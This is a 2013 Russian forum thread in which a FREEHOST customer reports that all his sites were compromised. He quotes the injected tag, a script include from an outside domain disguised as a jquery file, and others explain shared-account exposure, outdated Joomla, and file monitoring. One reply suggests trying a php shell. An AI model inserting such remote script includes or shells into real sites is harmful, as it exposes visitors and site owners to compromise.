Добрый день!

Такая ситуация, хостюсь на FREEHOST, всё было хорошо, были конечно иногда траблы, но не такие как сейчас.
В общем одним утром обнаруживаю, что все мои файлы в которых есть <head> заменены на <script language="JavaScript" src="http://stummann.net/steffen/google-analytics/jquery-1.6.5.min.js" type="text/javascript"></script></head>
то есть кто-то как-то получил доступ ко всем файлам из моего аккаунта и произвёл там замену. Подскажите пожалуйста как такое могло произойти ?

Очень нужна ваша помощь, т.к. починить как бы я могу, но если такое повторится что мне делать ? Я думаю это проблема хостинга а не моих сайтов, и наверное надо доводить дело до суда, что скажете ?

Вот текст переписки с службой поддержки:

Я:
Добрый день поддержка,
Пишу вам, потому что все мои сайты в моём аккаунте были взломаны. И мне нужен лог ФТП доступа за последний месяц.

Мне нужно знать причину поломки, т.к. сделать уязвимость на всех сайтах просто невозможно.
Не могли бы вы предоставить мне лог ФТП доступа за последний месяц, а лучше два?

У вас на сайте я пробовал посмотреть лог, но он даётся только на неделю, может чуть больше.

Поддержка:
Здравствуйте.
Благодарим за ваше обращение.

К сожалению, log храним только за две недели, он должен быть доступен Вам с панели управления.

Я:
Хорошо, тогда предоставьте мне какой-то отчет, по которому я могу понять как так получилось, что все мои сайты в одном аккаунте были взломаны, то есть были добавлены строчки стороннего кода. Были добавленные строчки стороннего кода даже туда, где есть просто файл index.html, .htaccess, logo.png, и гугл аналитик файл с одной строчкой текста. На всех файлах стояли права 644.

Ожидаю ваш ответ.

Поддержка:
Здравствуйте.
Благодарим за ваше обращение.

Взлом сайтов может быть не обязательно по ФТП, более вероятный вариант это взлом по HTTP. Если есть уязвимость в одном сайте, значит доступ есть к файлам всего аккаунтах, потому что пользователь у сайтов хостинг-аккаунта один. Вы можете проанализировать логи HTTP, они так же доступны в панели управления.

Других логов мы не предоставляем.

Я:
По логам HTTP ничего подозрительного нет, кроме обращения к несуществующим файлам.
Как у вас может происходить взлом по HTTP, объясните пожалуйста. Что необходимо что бы был доступ к моим файлам ?

жду ответ ...

Смею Вас поздравить с новым открытием: во взломе Ваших сайтов могут быть (и с наибольшей вероятностью) виноваты не хостеры, а технологические отверстия в безопасности.
Хостер предоставил Вам всю информацию, которую мог, без ковыряния в Ваших дырявых носкахскриптах. Лучше отправьте логи разработчикам Ваших скриптов и спросите их, как они написали такое гоие скрипты. Ну, или если Вы пользуете готовые движки, посмотрите, давно ли Вы их обновляли. И, пожалуй, попросите их посмотреть бэкапы - если поломали недавно, то стоит восстановить их бэкап и сделать себе его резервную копию.

Я конечно не великий разработчик, но все те сайты (почти) делал я. Я не спорю что большинство написано как ###.
Да я использую Joomla, в некоторых местах есть Joomla 1.5.

То есть выходит, что с помощью одного дырявого скрипта они смогли получить доступ ко всем файлам в аккаунте, так ?
Как обойти это после того как я всё почищу ?

Это сообщение отредактировал(а) Alexblbl - 10.10.2013, 12:01

Судя по переписке саппорт вам ни чего не ответил, разбирайтесь сами. Сломать могли и по ФТП и просто хостера ломануть, вместе с вами масса сайтов была бы сломана на других акках. ТО что меняли одну строчку и заливали один и тот же по составу файл  - говорит об автоматической обработке, значит на движку им было фиолетово. Почитайте по инету, по форумам и у хостера на форуме (если есть) за последнее время какие к нему были претензии от других хостящихся.

Всегда обновлять движки и соблюдать рекомендации разработчиков.

PS^ Но я сам держу там несколько сайтов, с ними все гуд и хостер вроде адекватный.

Это сообщение отредактировал(а) Ontovendor - 10.10.2013, 14:02

Большое спасибо!

Именно так - как правило один клиент - один пользователь на сервере. Т.е. запустив небезопасный скрипт на к/л из Ваших сайтов, можно получить доступ ко всем файлам Вашего пользователя. Т.е. - ко всем Вашим сайтам.
Для примера - залейте на хостинг какой-нибудь php shell или что-либо подобное - посмотрите в консоли что из одного сайта - получаете доступ к дргим без каких-либо проблем.

Проверять безопасность. Если не соответствует - выносить небезопасные сайты на отдельный аккаунт и там с ними мучаться.
Можно сделать синхронизацию - по rsync или svn и периодическую проверку по cron изменившихся файлов. Но тут есть один минус - файлы-то отслеживать проще простого, а с базами уже так не выйдет.

А базы как замешаны ?
Получается в базу тоже получаешь доступ ?
Есть ссылкочка как сделать синхронизацию ? WebStorm не поможет ?

Базы замешаны так, что имея доступ к файловой системе, можно из конфигов получить пароли к ним. И насоздавать/наменять скриптов, которые будут работать с базой. Например сделают дамп и выложат куда-нибудь.
Ссылочки нет - почитайте про svn/git/rssync на выбор. Что есть WebStorm не имею представления, потому не могу ответить.